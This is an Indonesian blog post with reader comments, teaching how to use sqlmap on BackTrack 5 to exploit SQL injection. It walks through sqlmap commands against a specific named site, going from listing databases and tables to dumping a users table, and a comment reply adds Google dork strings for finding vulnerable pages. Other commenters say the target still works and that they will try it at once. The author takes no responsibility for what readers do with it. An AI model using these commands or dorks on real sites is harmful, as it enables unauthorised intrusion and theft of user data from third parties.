-->

K.E ^_~ Yang lagi galau ini penawarnya link

Cara menggunakan sqlmap pada backtrack 5

dear all..:)

Akhirny kesampaian juga nulis artikel disini lagi :)
okok langsung aja kali ini gw mau sharing tentang cara penggunaan sqlmap. Sqlmap adalah salah satu tools pentest di linux backtrack yang kegunaanny untuk mengexploitasi web yang vulnerable terhadap serangan sql injection..:).

Buat maniak ubuntu juga bisa kok (tinggal download aja toolsnya). Oke langsung aja setelah lo dah dapet target yang vuln sql injection, ikuti langkah-langkah berikut:

1.buka sqlmap kalian

Application - Backtrack - Exploitation - Web Exploitation Tools - SqlMAP

2.setelah terbuka tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 --dbs




-u       = url
--dbs  = kita mencari nama databasenya...

3. Setelah ketemu nama databasenya yaitu="uselessj_uj2006"
tuliskan syntax berikut ex= python sqlmap.py –u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 --tables

-D            = nama database yang sudah kita temukan tadi
--tables     = untuk mencari nama table..

4. Nama table akan keluar dan hasilny ternyata ada table user,.
oke untuk melihat isi columnsny tuliskan syntax berikut...:)
ex= python sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --columns


lanjut..
ex= pytho sqlmap.py -u http://uselessjunk.com/article_full.php?id=12689 -D uselessj_uj2006 -T tbl_users --dump

fungsi dump untuk mengambil semua isi di table admin..hasil dump bisa diliat di dir sqlmap itu sendiri..;)

oke kalo udah gini terserah kalian mau diapakan..ane gak tanggung jawab yee..sekedar sharing aja buat pembelajaran :P

regard

CitooZz Banditozz

comment 8 komentar

  1. wow, victimnya masih bisa di pake :D

    BalasHapus
  2. keren mas makasih ya......langsung praktek nih

    BalasHapus
  3. Gan saya mau nanya nihh ..

    Download Tools nyadmn yah gan ?
    susah nyari nya ...

    BalasHapus
  4. /article_full.php?id=12689 yg ini maksud ny apa gan?

    BalasHapus
  5. biar tau *.php?id=xxxxx
    cara nyari tau xxx_nya gmna gan?

    BalasHapus
    Balasan
    1. inurl:index.php?id=
      inurl:trainers.php?id=
      inurl:buy.php?category=
      inurl:article.php?ID=
      inurl:play_old.php?id=
      inurl:declaration_more.php?decl_id=
      inurl:Pageid=
      inurl:page.php?file=
      inurl:newsDetail.php?id=
      inurl:gallery.php?id=
      inurl:article.php?id=
      inurl:show.php?id=
      inurl:staff_id=

      search d google

      Hapus

Catatan:
Seluruh komentar yang masuk akan dimoderasi terlebih dahulu. Komentar yang berbau spam, kasar, menghina, seluruhnya yang bersifat menghancurkan bukan membangun tidak akan ditampilkan. Silahkan bertanya dan memberi pendapat dengan sopan dan sesuai aturan.

Anda diperbolehkan mempublikasikan ulang artikel ini, dengan syarat:
1. Mintalah izin dengan cara berkomentar di bawah artikel ini
2. Wajib menyertakan link ke artikel ini dan menyertakan nama penulis

 
© Klikedukasi 2008 - 2013 | Design by Panembahan Satyapradana | 170p3x